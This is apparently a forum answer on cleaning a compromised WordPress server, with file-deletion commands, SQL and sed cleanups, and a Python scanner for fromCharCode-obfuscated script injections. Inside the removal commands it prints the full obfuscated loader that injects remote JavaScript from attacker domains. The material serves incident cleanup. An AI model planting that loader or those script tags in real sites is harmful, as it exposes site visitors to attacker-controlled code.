This is my list of commands for Linux CentOS:
1. remove malware scripts
find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
Put this command in cron to keep the server clean (if malicious files are found on the server, they are deleted every 15 minutes):
# execute every 15 minutes
*/15 * * * * find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
2. clean cache from WP plugin
3. clean db
Use these SQL queries:
#check affected records
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
#clean db
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?w=1'></script", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns1' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://js.donatelloflowfirstly.ga/statistics.js?n=ns1"" type=""text/javascript""></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://scripts.lowerbeforwarden.ml/src.js?n=ns1"" type=""text/javascript""></script>", ''));
#recheck if all is clean
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
4. check and clean malicious code inside the file
Check for malicious code injected in plain text:
cd /var/www
grep -rlF "donatello"
grep -rlF "blackwater"
grep -rlF "lowerbeforwarden"
Clean the code injected in plain text:
grep -rlF "donatello" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/js.donatelloflowfirstly.ga\/statistics.js?n=nb5'><\/script>//g"
grep -rlF "lowerbeforwarden" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.lowerbeforwarden.ml\/src.js?n=nb5'><\/script>//g"
Check for encoded malicious code, which converts a numeric string:
String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)
In UTF-8 you will see:
h,t,t,p,s,:,/,/,s,c,r,i,p,t,s,.,l,o,w,e,r,b,e,f,o,r,w,a,r,d,e,n,.,m,l,/,s,r,c,.,j,s
Find the code:
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"
Delete the code:
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();<\/script>//g"
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();//g"
The last encoded string is for the "lowerbeforwarden" variant; use the correct sequence for "donatello".
Hope this helps.
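As an added example (not part of the original answer), a small Python scanner that finds String.fromCharCode(...) sequences like the one above, decodes them, and flags those that decode to the indicators named in this answer, so a grep for one hard-coded number sequence does not miss a re-spaced or re-ordered variant. The sample file content is constructed for the demonstration.

```python
import re
from pathlib import Path

# Indicators taken from the post above (domains and markers of the injected scripts).
KNOWN_BAD = ("donatelloflowfirstly.ga", "lowerbeforwarden.ml", "donatello",
             "blackwater", "directednotconverted", "lowerbeforwarden")
# Matches String.fromCharCode(104, 116, ...) with any spacing between the numbers.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9]+(?:\s*,\s*[0-9]+)*)\s*\)")

def decode_charcodes(arg: str) -> str:
    # Turn the comma-separated code points inside fromCharCode(...) back into text.
    return "".join(chr(int(n)) for n in arg.split(","))

def find_obfuscated(text: str) -> list:
    # Every fromCharCode() call in `text`, decoded, with a flag if it names a known indicator.
    findings = []
    for m in FROMCHARCODE.finditer(text):
        decoded = decode_charcodes(m.group(1))
        findings.append({"offset": m.start(), "decoded": decoded,
                         "known_bad": any(ioc in decoded for ioc in KNOWN_BAD)})
    return findings

def scan_tree(root: str, suffixes=(".php", ".js", ".html")) -> dict:
    # Walk `root` (e.g. /var/www) and map each file to its known-bad decoded strings.
    hits = {}
    for path in Path(root).rglob("*"):
        if not (path.is_file() and path.suffix in suffixes):
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip it rather than abort the whole scan
        bad = [f for f in find_obfuscated(text) if f["known_bad"]]
        if bad:
            hits[str(path)] = bad
    return hits

# Constructed sample resembling the loader quoted in the post (not a real file).
SAMPLE = (
    "<script type=text/javascript>(function(){var elem=document.createElement("
    "String.fromCharCode(115,99,114,105,112,116));elem.src=String.fromCharCode("
    "104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,"
    "98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);"
    "})();</script>"
)

if __name__ == "__main__":
    for f in find_obfuscated(SAMPLE):
        print(f"offset={f['offset']} bad={f['known_bad']} {f['decoded']!r}")
```

Run scan_tree("/var/www") to list files whose decoded strings reference one of the indicators; review each hit before removing anything, since the decoded text tells you which variant you are dealing with.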